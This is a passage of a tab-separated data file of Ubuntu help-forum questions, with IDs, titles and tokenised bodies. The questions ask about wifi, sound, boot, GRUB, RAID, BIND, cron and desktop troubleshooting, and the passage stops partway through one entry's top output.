382698	which software can i use for simple vj'ing ?	i would like to make an audio-visual background for reading a story aloud . i have a bunch of mp4 videos and still images which i need to arrange in a script ( playlist ) and manually step through during the performance . the `` script '' i envision is very simple and looks like the following : play intro video ( one time ) show intro image ( then pause until manual advance ) play main video ( looped until manual advance ) play final video ( one time , then stopped showing a certain frame ) the requirements i have are : a . videos need to be seamless ( no player gui showing up on the projection ; so the gui , if any , probably should be on internal screen while seamless fullscreen video goes to video out ) b. i can go to next video in the playlist through the keyboard c. when switching between videos/pictures in the playlist , there should be a cross-fade or fade-out / fade-in transition d. it would be nice to be able to combine audio from one file with video from another , each of different length , looping independently ( optional ) e. it would be nice to be able to play video or audio from not in its entirety , but from point a to point b ( optional ; i guess i can acheive the same by cutting video to pieces ) i probably could just use a video player : a playlist that i can manually step through and crossfading support are features that i should be able to find , and i could cope without requirements d and e somehow . however , i decided than more than a video player would be nice : for one , showing images and playing a to b are outside the capabilities of video players that i looked at . also , i could use the ability to add extra effects later , when i learn to use the proper vj'ing tool . the ability to broadcast the result could also be nice , but this will have to wait for later . i see veejay and other vj'ing software suggested here : simple vj software for background video in live concert . do you think veejay is the right tool for my scenario or would you advise to use another one ? the learning curve for it seems rather steep : i can not even play a single video at fullscreen with it right away ! it would be great if you could you advise me how to do some of the following specific items : i . with veejay i have to write an sh script to start my project , right ? i imagine i should at least do things like ( i got this from getting started ) export veejay_screen_geometry=2624x1024+1600x0 export veejay_screen_size=1024x768 export veejay_fullscreen=1 there , then start veejay ? ii . set up the screens properly . at home i have a laptop ( 1280*800 resolution ) connected to an external monitor ( 1920*1080 resolution ) . at the place i will connect the laptop to a projector . when i start veejay from a command line , a separate video window opens . how do i make it start fullscreen on external monitor instead ? iii . make a script with videos and images , as above . specifically , how do i display an image ? i can show video with veejay -v video.avi iv . make veejay play videos of any format . i have only managed to make veejay play avi 's , but not mp4 and mkv , though my vlc player plays them alright . installing ubuntu-restricted-extras did n't help . v. use crossfading for audio and video ( i realise the list is growing too big , but can you just point me where to look at ? ) vi . play audio/video from point a to point b. vii . play video from one file and audio from another , simultaneously . my system is ubuntu 13.04 64-bit on thinkpad x200 ( core 2 duo 2.26 ghz , 8 gb ram , ssd ) .
382700	tried resetting my admin password now ubuntu wont boot up !	i 'd forgotten my admin password on ubuntu so i attempted to reboot into recovery mode using these instructions : how do i reset a lost administrative password ? when i did hold down the left shift key nothing would happen so i did a hard reset and then it would n't boot up at all ! did i do something wrong ? what should i do ? sorry about this , im still new to this sorta thing !
382701	ubuntu 13.10 blank screen with cursor after installing libopencv-dev	after installing libopencv-dev from the ubuntu repository , i get a blank screen with cursor after logging into a session ( after restarting the computer ) . i think there were some nvidia-related packages installed . i do n't know if it has anything to do with it . i 'm using ubuntu 13.10 with intel hd 4000 graphics . edit : ok the problem was a libopencv-dev bug that installs nvidia packages on non nvidia graphics machines , causing the blank screen problem . to fix this : sudo apt-get purge nvidia-319* how to solve this ?
382702	problems with 5ghz wifi in kubuntu	networkmanager works just fine as long as i 'm connected to a 2.4ghz access point . i can suspend , resume , etc and it always finds my proper network and reconnects . the problem begins when i select a 5ghz wifi network . i can see and connect to the network and it functions just fine , but when i suspend/resume and occasionally when i reboot none of the 5ghz networks show up in the network list . i have to completely disable wireless networking for several seconds , then re-enable it to find my access point .
382703	faac in ubuntu 13.10 does n't support mp4	in ubuntu 13.10 , faac does n't support mp4 . if you run faac -- help you get : freeware advanced audio coder faac 1.28 usage : faac [ options ] infiles ... options : -q set quantizer quality . -b set average bitrate to x kbps . ( abr , lower quality mode ) -c set the bandwidth in hz . ( default=automatic ) -o x set output file to x ( only for one input file ) -r use raw aac output file . -p raw pcm input mode ( default 44100hz 16bit stereo ) . -r raw pcm input rate . -b raw pcm input sample size ( 8 , 16 ( default ) , 24 or 32bits ) . -c raw pcm input channels . -x raw pcm swap input bytes -i input channel config , default is 3,4 ( center third , lf fourth ) mp4 specific options : mp4 support unavailable . documentation : -- license show the faac license . -- help show this abbreviated help . -- long-help show complete help . more tips can be found in the audiocoding.com knowledge base at http : //www.audiocoding.com/wiki/ in previous versions , i could run faac with -w and -- artist , -- album , etc . options , and now i ca n't .
382704	show full server name in command line	i have several servers that have the same prefix in their name : mail.servername . when i have several sessions open ( i use putty from windows 7 ) , it is a minor pita to figure out which one is which since putty names the windows user @ mail and the command line displays user @ mail : ~ $ for all of them . is there a way to have the full server name displayed ? i do n't have the option of changing the servers ' names .
382707	ubuntu wireless problems	i have a lenovo ideapad yoga 13 with windows 8 preinstalled , and i installed ubuntu 12.04 on it , and i have been having problems with wireless . whenever i go to the top toolbar with the wireless icon and click it , it says `` no network devices available . '' i have a router , a linksys ea3500 router , and with windows it works fine . any advice or solutions ?
382709	why i get randomly `` failed to mount windows share : connection timed out '' with vpn connection ?	in ubuntu 13.10 ( everything is up-to-date ) i get randomly this error popup message , during working with shared folders using a vpn connection over the internet : unhandled error message : failed to mount windows share : connection timed out effect : working with shared folders is not working anymore / sometimes it works .
382713	recoll wo n't start	whenever i try to open recoll , i get a popup box with this message : configuration problem : configuration could not be built : explicitly specified configuration must exist ( wo n't be automatically created ) and i get this as stderr : $ recoll got bus address : `` unix : abstract=/tmp/dbus-go0lj4yycr , guid=e695867e0d6df401c0df2baf0000dd87 '' connected to accessibility bus at : `` unix : abstract=/tmp/dbus-go0lj4yycr , guid=e695867e0d6df401c0df2baf0000dd87 '' registered dec : true :4 : main.cpp:143 : recollcleanup : writing settings i 've tried deleting the .recoll folder and running sudo apt-get purge recoll & & sudo apt-get install recoll , but they did n't help . update : version information . $ apt-cache policy recoll recoll : installed : 1.16.2-1 candidate : 1.16.2-1 version table : *** 1.16.2-1 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/universe i386 packages 100 /var/lib/dpkg/status $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise update 2 : created bug report . https : //bitbucket.org/medoc/recoll/issue/168/recoll-wont-load-even-after-removing
382716	no longer able to connect to network	new to ubuntu , i installed rel . 12.04lts and i really enjoyed my experience . i tried to connect to my wifi for the first time this morning and it did n't work . i tried the first thing : update my drivers through the settings menu . the process went through normally but my wifi was still not visible . i search in the forums and found that some people had success with wcid . i installed it and since then , not only that i still do not have access to wifi , i also lost my wired connection . uninstalling it has n't changed the situation . another thing happened , that might or might not be related but since then , the shutting down of my pc does n't work . the shut down routine starts but stays stuck on the ubuntu splash screen ( the one with the 5 flashing dots ) and i have to force the shut down . regards dell inspiron 1501 ubuntu 12.04 lts
382718	running a script everyday using a cronjob	i need the exact code that i would use because i 'm not able to figure it out . i use crontab -e to set up a cron job but when i save it , it never works . i 'm also just trying to run a file called newmail.sh from the root user .
382720	wifi menu not showing	so recently everything 's been working fine but suddenly , i come home to find the wifi not working at all . it 's like somebody ripped out my wifi antenna or something . problems : there is n't an enable wifi option in the drop-down menu . the only thing it shows me is that i 'm not connect via ethernet .
382721	create clock in terminal that will remain after restart of system	is it possible to create some sort of a clock in the terminal that will remain after shut-down of the os . what i want is an persistent clock of an user selected start time . in the terminal you can write time but i am not sure how to make it persistent after i shut-down my pc . real 0m0.000s user 0m0.000s sys 0m0.000s date ons 27 nov 2013 01:52:07 cet
382723	gtk3.0 gtkbuttons and junctions sides	i 'm trying to align many gtkbutton with junction sides but the result is not what i want some help please my code : it is a python code for gtk3.0 ( 3.6 ) i 'm on ubuntu 13.04 import gi.repository from gi.repository import gtk def dest ( widget ) : widget.destroy ( ) gtk.main_quit ( ) win = gtk.window ( gtk.windowtype.toplevel ) hbox = gtk.box ( ) bt0 = gtk.button.new_with_label ( `` zero '' ) bt1 = gtk.button.new_with_label ( `` one '' ) bt2 = gtk.button.new_with_label ( `` two '' ) bt0.get_style_context ( ) .set_junction_sides ( gtk.junctionsides.right ) bt1.get_style_context ( ) .set_junction_sides ( gtk.junctionsides.left|gtk.junctionsides.right ) bt2.get_style_context ( ) .set_junction_sides ( gtk.junctionsides.left ) win.connect ( `` destroy '' , dest ) hbox.pack_start ( bt0 , false , false , 0 ) hbox.pack_start ( bt1 , false , false , 0 ) hbox.pack_start ( bt2 , false , false , 0 ) win.add ( hbox ) win.show_all ( ) gtk.main ( ) thanks ps : an c or python example of a code using the gtk_junction_set_sides would be good : )
382726	dummy output in audio ; nothing is working ( alsa broken ? )	problem : my audio is not working . i 'm getting that `` dummy output '' in the sound settings . i 've been scouring the web , but nothing i try is working . i 've tried sudo alsa force-reload sudo apt-get remove -- purge alsa-utils sudo apt-get install alsa-utils i 've tried about every single little thing , and it 's driving me crazy . ubuntu dist : saucy salamander ( 13.10 , running gnome-3 desktop ) results of lspci : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation 7 series chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 02:00.0 network controller : qualcomm atheros ar9485 wireless network adapter ( rev 01 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5289 ( rev 01 ) 03:00.2 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 0a ) ( was n't quite sure how much you guys needed ) for some reason , i do n't have a .asoundrc file or /etc/asoundrc.conf file . i ca n't get into alsamixer either . i 've uninstalled , reinstalled , uninstalled , and reinstalled alsa-base , alsa-utils , pulseaudio , and even wine . i do n't know what else to do at this point . can you guys help me ? edit : sudo alsa force-reload returns unloading alsa sound driver modules : ( none loaded ) . loading alsa sound driver modules : ( none to reload ) . do i have to reinstall ubuntu ?
382728	networking from windowsxp to new ubuntu 12.04 . network yes , firefox still no	i was able to get internet when wired direct . i 'm trying to feed through a netgear wifi . it is recording 100 mbps wired and 135+ wireless . firefox was working after the ubuntu 10.4 install . i 'm not sure if the upgrading to firefox 25 had anything to do with the failed connection . is there a control panel or settings in firefox that i 'm missing~ ? i noticed another post suggesting problems after version 21 of firefox . any chatter on that~ ? windowsxp draws the broadband from tw @ 1g . feeding that direct into the netgear loses too much bandwidth . so i 'm trying to feed the netgear from the xp and then on to the new ubuntu build .
382730	dual boot - installing ubuntu on pre-installed windows 8 ... then lost dual boot	i have an acer laptop , aspire m it came with a pre-installed windows 8 . i 've made a boot usb key with ubuntu 13.04 , created a 4gb swap partition , and an ext3 partition for ubuntu . then on the reboot , it only finds ubuntu in the grub . i 'm no expert . i know my way around the basic stuff , basic understanding but that 's it .
382733	ubuntu server poweroff and reboot and others can not work in terminal	ubuntu server can not reboot or poweroff . and other commands can not run ! root @ cloud1 : ~ # reboot sorry , command-not-found has crashed ! please file a bug report at : https : //bugs.launchpad.net/command-not-found/+filebug please include the following information with the report : command-not-found version : 0.2.44 root @ cloud1 : ~ # lsof -i:8080 sorry , command-not-found has crashed ! please file a bug report at : https : //bugs.launchpad.net/command-not-found/+filebug please include the following information with the report : command-not-found version : 0.2.44
382734	gateway laptop ubuntu 13.10 wifi not working	i ca n't be online with wifi in the office . wifi is shared by around 10 people here , and it works well with other computers . my laptop is gateway m-series . is there any way to get wifi working ?
382740	how to install cave story ?	so i 've downloaded the .tar.gz file for cave story , and since i 'm somewhat new to ubuntu , i have no idea how to install it . i tried the commands suggested at how do i install a .tar.gz ( or .tar.bz2 ) file ? , but no dice . my most successful attempt was make config.dat , which spat out a different error than make all the other files . so i assume that 's what i should be going with ? it says : '' make : *** no rule to make target `config.dat ' . stop . '' do i type something else in ?
382741	wireless problem not loading	ubuntu 13.10 wired connection works fine ( 30+ down , ~10 up ) wireless says it 's connected but does n't load . have tried the ipv6 and disable n tricks . did n't help at all . ( so i did n't make them permanent . ) here is the wireless adapter info : warning : you should run this program as super-user . pci ( sysfs ) *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 05 serial : 18:03:73:80:53:72 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.1.145 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:51 ioport : e000 ( size=256 ) memory : f1104000-f1104fff memory : f1100000-f1103fff *-network description : wireless interface product : centrino wireless-n 1030 [ rainbow peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:09:00.0 logical name : wlan0 version : 34 serial : ac:72:89:60:00:81 width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.11.0-13-generic firmware=18.168.6.1 ip=192.168.1.247 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:53 memory : f7e00000-f7e01fff warning : output may be incomplete or inaccurate , you should run this program as super-user . anything else i can try to do to fix this ?
382743	how to check what has happened between booting ubuntu and getting to the desktop	how can i easily check what has happened between booting ubuntu and getting to the desktop . for example , how was my hardware detected and configured , any warnings or errors related to hardware / software and any other information i can see to do a proper diagnostic of the boot process .
382746	bought off lease dell , with ubuntu installed ... need password	i had bought an off lease dell with ubuntu pre-installed ... .whenever i try and update any updates to anything , it asks for a password , which i had never created . nothing works ... help , please ? thanks
382747	ubuntu 13.10 bluetooth wo n't work after update ( toshiba l845 )	i 've installed ubuntu 13.04 in my toshiba satellite l845 and i installed blueman to get the bluetooth working . after updating to ubuntu 13.10 i ca n't see my phone with either blueman or the default ubuntu app . in fact blueman wo n't even start and there is some random behavior in ubuntu 's indicator , if i turn off the bluetooth the indicator randomly disappears and it wo n't appear again until next boot up . anyone with the same issue ? ? thanks !
382750	how to save scrollback history in byobu ?	i 've had an interesting terminal session in byobu , and i 'd like to save the terminal output ( commands and all ) to a file - how can i do that ? according to the byobu man page : ctrl-a ~ - save the current window 's scrollback buffer this may indeed be doing something , but i 've found no indication of where and under what name it might be saved .
382753	how to change drive name	my disk have 3 partition , one for system and others for store data . i can change its label , but i can not change path for that partition . my partition have a `` work '' label name , but i must input /media/dd7e8652-201e-4ea6-bb9b-8469091ecb25 to access in command line . how can i access via /media/work command ? thank for any command and answer : - )
382754	some fn keys completely messed up in toshiba satellite l845	the brightness +/- fn key and the one for changing to an external monitor are messed up . if i try to press any the system will suspend for 3 seconds and then return asking my password to unlock the desktop . i already tried to change the grub using editing this file : /etc/default/grub but it did n't work . i 'm a noob in ubuntu , any help will be great ! thanks
382755	how to start chrome always in `` incognito mode '' ?	so ... i found a solution to be able to open chrome on 12.04 in incognito mode by default ( how do i make google chrome open incognito by default in 12.04 ? ) . i ca n't seem to get it to open consistently in incognito mode with all the pages i have set to load on startup e.g . in os x , i open chrome , which defaults to incognito mode and loads all the websites i have set in the `` open a specific page or set of pages '' preference . in ubuntu i ca n't replicate that .
382756	linux-kvm `` broken '' after a motherboard swap	i just had the motherboard replaced in a dell poweredge r410 that functions as one of our virtual servers ( running ubuntu 10.04.3 lts ) . i 'm fairly new to linux , and was quite surprised when networking was completely broken after the swap . another disclaimer is that i did n't build our virtual servers to begin with , and have very limited understanding of how linux-kvm works . once the motherboard was swapped , i then ran the lifecycle controller application and applied a variety of upgrades ( the most notable of which would be firmware upgrades for the nics ) . after a lot of research , i finally managed to `` fix '' networking by editing the /etc/udev/70-persistent-net.rules file . within that file , i removed the 2 old broadcom ( bnx2 ) entries for the prior motherboard , and then renamed the new bnx2 eth2 and eth3 to eth0 and eth1 respectively . i then moved eth0 and eth1 to the top of the document . the ( igb ) entries are for a pci-based intel gigabit nic that 's currently unused . here are the contents of my 70-persistent-net.rules file : # this file was automatically generated by the /lib/udev/write_net_rules # program , run by the persistent-net-generator.rules rules file . # # you can modify it , as long as you keep each rule on a single # line , and change only the value of the name= key . # pci device 0x14e4:0x163b ( bnx2 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 78:2b : cb:20:9d:71 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x14e4:0x163b ( bnx2 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 78:2b : cb:20:9d:72 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth1 '' # pci device 0x8086:0x10c9 ( igb ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 90 : e2 : ba:0c:7e : f9 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth2 '' # pci device 0x8086:0x10c9 ( igb ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 90 : e2 : ba:0c:7e : f8 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth3 '' this resolved the networking being completely broken ( could n't ping the gateway before ) , but a much more major issue has persisted where the server hardware randomly reboots . i ca n't easily reproduce the crash , but it entails bringing up the 5 guest oses that are running on the machine , and then doing splunk queries/pings/running x11 forwarding to putty , etc . the hardware itself passes all self-tests , and a dell technician reviewed a dset i collected and mentioned everything looks great hardware-wise . here 's my /etc/network/interfaces file : auto lo iface lo inet loopback auto eth0 iface eth0 inet manual auto eth1 iface eth1 inet manual # 10.1.225.x network auto br0 iface br0 inet static address 10.1.225.12 netmask 255.255.255.0 network 10.1.225.0 broadcast 10.1.225.255 gateway 10.1.225.1 bridge_ports eth0 bridge_fd 9 bridge_hello 2 bridge_maxage 12 bridge_stp off # vlan 231 auto eth1.231 iface eth1.231 inet manual up ifconfig eth1.231 up # kvm bridge , vlan 231 , via eth1 iface br231 inet static bridge_ports eth1.231 bridge_fd 9 bridge_hello 2 bridge_maxage 12 bridge_stp off # # vlan 229 # auto eth1.229 # iface eth1.229 inet manual # up ifconfig eth1.229 up # # kvm bridge , vlan 229 , via eth1 # auto br229 # iface br229 inet manual # bridge_ports eth1.229 # bridge_maxwait 5 # bridge_fd 1 # bridge_stp on # # ! ! ! ! ! note ( mgrace ) : this *is* used ! ! ! ! ! # # no ! unused auto br1 iface br1 inet manual bridge_ports eth1 bridge_fd 9 bridge_hello 2 bridge_maxage 12 bridge_stp off # auto br2 # iface br2 inet manual # bridge_ports eth1 # bridge_fd 9 # bridge_hello 2 # bridge_maxage 12 # bridge_stp off # auto br3 # iface br3 inet manual # bridge_ports eth1 # bridge_fd 9 # bridge_hello 2 # bridge_maxage 12 # bridge_stp off i 've scanned every log i can get my hands on , and have yet to find a bread crumb to follow = ( . the dell technician mentioned this should potentially be as easy as changing the hypervisor 's mac address , but i 've been unable to figure out how to do that up until this point . any help is greatly appreciated , and i 'd be happy to provide any additional information that may prove beneficial . thanks , -snipe
382760	wirelessly connect canon pixma mg3222 printer	the canon pixma mg3222 printer i purchased works fine when wired but how do i get it to connect wirelessly to my laptop with ubuntu 12.04 ?
382761	how to change mount point ?	during ubuntu 12.04 installation i selected mount point for a 145gb drive to /usr/local . how can i change it ?
382763	mdadm raid array doesnt recognise harddisks at startup	i created 2 hardware raid 0 arrays of 1tb each . they are currently working fine . i 've got those 2 arrays and a real 1tb hard-disk in a raid1 array , which is 1 tb . the reason i 'm doing this is because i want to be able to quickly access lots of different files and not having to worry about data loss when something breaks down . to make everything a bit more clear , this is how everything is arranged : 0.5tb harddisk + 0.5tb harddisk = 1tb hardware raid 0 /dev/dm-1 0.5tb harddisk + 0.5tb harddisk = 1tb hardware raid 0 /dev/dm-0 1tb disk /dev/sda those 3 are put together to 1 software raid1 the problem however is : those hardware raid-0 arrays are named /dev/dm-0 and /dev/dm-1 at startup . ubuntu doesnât immediately recognise them as part of my raid array.when i click on the disks ubuntu tells me they are part of the raid1 array , but when i click the ( degraded ) array it tells me those 2 disks are missing . so every time i boot my workstation i have to re-add and `` recover '' the raid1 array with all data intact . is there a way to make ubuntu recognise these disks better ? thanks a lot in advance ,
382765	auto-starting seafile server 12.04 ( server edition )	i 'm having trouble getting seafile to auto-start upon boot-up . here 's what i 've done so far : created ~/lovette/seafile-control-script.sh # ! /bin/sh # /etc/init.d/seafile # # start/stop/restart seafile and seahub seafiledir=/home/lovette/ currentrelease=seafile-server-2.0.4 # carry out specific functions when asked to by the system echo `` $ 1 seahub `` $ seafiledir/ $ currentrelease/seahub.sh $ 1 echo `` $ 1 seafile `` $ seafiledir/ $ currentrelease/seafile.sh $ 1 exit 0 made it executable : chmod 750 seafile-control-script.sh created another file in /etc/init.d/seafile # ! /bin/sh cmd= '' sudo bash -c 'cd ~/lovette ; ./seafile-control-script.sh $ 1 ' '' su - colter -c `` $ cmd '' also , made it executable : sudo chmod 750 /etc/init.d/seafile turned it into a service : : cd /etc/init.d : sudo update-rc.d seafile defaults the switches ( start/stop ) work great and if i run them once the system boots , seafile has no issues starting up . however , the system simply wont do it automatically ( ie . if i reboot , seafile is not started . ) i 've tried to review the way init script are written for other programs and there does n't seem to be any discrepancies with the process here and that coupled with the start/stop working correctly , i 'm at a loss as to why ubuntu would n't be successful at getting it to start on it 's own . could it possibly be because a dependency it needs is trying to start after this script is ran ( mysql for example ) , can i somehow reorder the start-up list if that is the case ? any ideas would be helpful . i apologize if this is elementary , i 'm a novice right now .
382767	how to pipe/dump clipboard contents to a file ?	i want to pipe/dump the contents ( esp . text ) of the clipboard/ctrl+c to a file , preferably using bash or perl ( in order ) . i 'd rather not use gui applications please .
382768	syntax highlighting with less , trouble with lexer	i have installed python-pygments and using it for syntax highlighting with less as described by mankoff here i put a function in my .bashrc cless ( ) { pygmentize -f terminal `` $ 1 '' | less -r } it is enabling syntax highlighting with less . but when i am going to open a file like /etc/fstab or /etc/apt/apt.conf a error saying error : no lexer for filename '/etc/apt/apt.conf ' found i found option to show pygmentize the lexer with -l at this manpage . but what will be the appropriate lexer for such files ? and how to use it ?
382770	bind conf files	new to ubuntu and trying to set up the server as a bind primary master domain is called fog.local ( i 'm using it for fog cloning ) server name is london ( ip 192.168.0.5 ) gateway is 192.168.0.1 so my named.conf.local file : zone `` fog.local '' { < br/ > type master ; < br/ > file `` /etc/bind/db.fog.local '' ; < br/ > } ; < br/ > < br/ > zone `` 0.168.192.in-addr.arpa '' { < br/ > type master ; < br/ > file `` /etc/bind/db.192 '' ; < br/ > } ; < br/ > < br/ > seems to be ok my db.fog.local file : ; bind data file for local loopback interface < br/ > ; < br/ > $ ttl 604800 < br/ > @ in soa fog.local . root.fog.local . ( < br/ > 9 ; serial < br/ > 604800 ; refresh < br/ > 86400 ; retry < br/ > 2419200 ; expire < br/ > 604800 ) ; negative cache ttl < br/ > in a 192.168.0.5 < br/ > < br/ > ; @ in ns ns.fog.local. < br/ > @ in a 192.168.0.5 < br/ > @ in aaaa : :1 < br/ > ns in a 192.168.0.5 < br/ > london in a 192.168.0.5 < br/ > < br/ > ; end of file < br/ > my reverse file ; bind reverse data file for local loopback interface < br/ > ; < br/ > $ ttl 604800 < br/ > @ in soa fog.local . root.fog.local . ( < br/ > 3 ; serial < br/ > 604800 ; refresh < br/ > 86400 ; retry < br/ > 2419200 ; expire < br/ > 604800 ) ; negative cache ttl < br/ > < br/ > ; < br/ > @ in ns ns. < br/ > 1.0.0 in ptr ns.fog.local. < br/ > 2.0.0 in ptr london.fog.local < br/ > ; end of file < br/ > < br/ > so my problem is i ca n't ping london or london.fog.local from a client workstation but i can ping ns.fog.local any help is appreciated thanks
382774	when i boot , i get a grub boot error : no such device , and then grub rescue > what should i do ?	i 've just installed ubuntu on my external hdd , during the installation it also installed grub boot loader since iâm also running windows 7 on my internal hdd . after the i installation though , i got a grub boot error : error : no such device : 54c36c16-b07e-40d3-9fe6-0bbb47a418bd entering rescue mode ... grub rescue > _ i 've already read several other tips and instructions on other forums that told me to enter the following code : set root= ( hd0 , msdos2 ) set prefix= ( hd0 , msdos2 ) /boot/grub insmod normal normal i tried this with all of my listed partitions but every time i enter `` insmod normal '' it gives me an `` unknown file system '' . what should i do ?
382777	ubuntu gui does not start since the installation of libgl1-mesa-glx	after the clean and fresh installation of ubuntu 12.04 , i installed libgl1-mesa-glx . since then , ubuntu gui does not start . when i turn the computer on , the grub starts . if i choose normal start on the grub menu , it shows the purple ubuntu screen for a short time then it turns to black screen . then the monitor give no signal message and goes to sleep down . if i choose secure start on the grub menu , i can reach the command line . via the command line ; i removed respectively libgl1-mesa-glx and previously installed packs libgl1-mesa-dev and ia32-libs . but no success . then i also reinstalled libgl1-mesa-dev , but nothing changed . the gui is not working since the installation of libgl1-mesa-glx . what can i do to recover the system now ? any help ?
382778	dual boot windows 8.1 and ubuntu 13.10 on 2 separate ssds	i 've searched every link in askubuntu , as well as google . many of my findings `` kind of , sort of '' get close to answering my questions , but not fully . hopefully i can find help here . i 'm building a machine currently ( based on clevo p150sm barebone ) if you can call it a build . the final build will have two msata ssds ( both separately 256gb ) and two sata hdd ( 500gb ) in raid . so , logically three drives . my goal is to have ubuntu 13.10 on one sdd as the primary boot os , and windows 8.1 installed on the second sdd as secondary . furthermore , the two hdds in raid will be for /swap and /home , partitioned so windows and ubuntu recognize it . my board is an efi board though it does support legacy bios . my machine shipped as a barebone ( no cpu , gpu , ram , storage or modules ) i 've installed the hardware on my own . so this will all be on clean , new hardware , with no prior installs or setup . i 've done setup on clean installs , and i 've done partitioning before . i 've never done anything with uefi or any partitioning this exotic before , and i 'm struggling trying to work this all out . any help would be appreciated . thank you in advance , even if it 's a link i may have missed .
382780	how to access files from other ubuntu installation	i have a running 12.04 ubuntu installation and an external hard drive that i 've attached to esata . when i try to mount the esata drive using disk utility , i get an error complaining that : error mounting : mount exited with exit code 1 : helper failed with : mount : according to mtab , /dev/sda1 is already mounted on / this is despite the fact that disk utility detects the drive as /dev/sdc . is there some way to work around this error ?
382781	recover encrypted home directory files	i tried to recover the home directory files using : sudo ecryptfs-add-passphrase -- fnek sudo mount -t ecryptfs /home/.ecryptfs/username/.private /media/username/home/ now everything is mounted properly and i can see the files using ls but ca n't copy or open files . output of ls -l of directory and files are d ? ? ? ? ? ? ? ? ? ? ? ? ? ? directory name - ? ? ? ? ? ? ? ? ? ? ? ? ? ? file
382782	give permission to /var/www	when i write this to give permission to www directory : zeb @ zeb-lenovo-b570 : /var $ chmod 251 www/ zeb @ zeb-lenovo-b570 : /var/www $ ls its gives error : ls : can not open directory . : permission denied i want to give permission to www folder so that i put my .php file here . help ?
382785	can not install asterisk 1.6.1.6.tar.gz on ubuntu 13.04	i installed ubuntu 13.04 using windows installer giving it 20gb of space . everything worked fine . but when i tried to update using sudo apt-get update , it does n't work fully okay . there were many hit , igr and get which i do n't understand . main thin is after this i try to install some dependencies for asterisk like swig and python-something and all . it says it does n't have that packages . for this reason , the asterisk installation could not be done too . what should i do ?
382786	stuck at `` updating blizzard update agent '' when installing world of warcraft	i 've tried searching through most of the other posts on here about getting wow to work , but most people say they can execute the .exe and have no problems loading the launcher . i also tried looking for the game in the play on linux database but it does n't appear to exist anymore . i tried using a playonlinux script but that failed after selecting the .exe . how can i get wow to run ? it always gets stuck at the same spot 1/3 of the way finished with updating blizzard update agent '' screen . i 'm using ubuntu 12.10 .
382788	ubuntu update changed terminal color , font size , theme etc , how to get to older settings ?	yesterday i installed updates which were queued for weeks and when i rebooted the system , everything got changed . terminal color became white from black , the window top bar became white/transparent from orange , the desktop background got changed etc can someone tell me how to get back to older theme/settings or how to change the current settings/theme ? can i look at what got updated so may be i can undo that or install what got uninstalled/upgraded ? thanks
382793	what 's is the difference between `` > '' and `` > > '' in shell command ?	does anybody could explain to me the difference using > and > > when using shell command ? example : ps -aux > log ps -aux > > log it seems results is the same .
382799	reduce memory consumption of 13.04	i 'm running 13.04 on a thinkpad t61p with 2gb ram . in 13.04 , and to a lesser extent in 12.04 , i 've started running out of my 2g of ram with little more than a browser open . clearly chromium is an insane memory hog , taking 700mb for 1 gmail tab + 1 askubuntu tab . i have tried different browsers ( firefox , opera , midori ) and they all look the same , taking several hundred mb with only 2 tabs open . it makes me think there 's something wrong with my system , because surely they are n't all that poorly built . i 'm also curious about all the gnome processes . 37m gnome-screensaver 39m nm-applet 79m gnome-panel 61m gnome-settings-demon surely the gnome utils should n't be taking 200mb of memory . i 'm running gnome with xmonad as the window manager . so how can i reduce the memory consumption of ubuntu 13.04 overall ? this was n't a problem for me a year ago . have common utilities and applications just bloated in ram consumption in the last year ? i can buy ram i suppose , but i really should n't need more than 2gb when the most intensive activity is an occasional youtube or flash video . here 's the output from top : top - 21:26:46 up 6 days , 23:38 , 1 user , load average : 2.07 , 1.81 , 1.75 tasks : 208 total , 1 running , 204 sleeping , 0 stopped , 3 zombie % cpu ( s ) : 30.1 us , 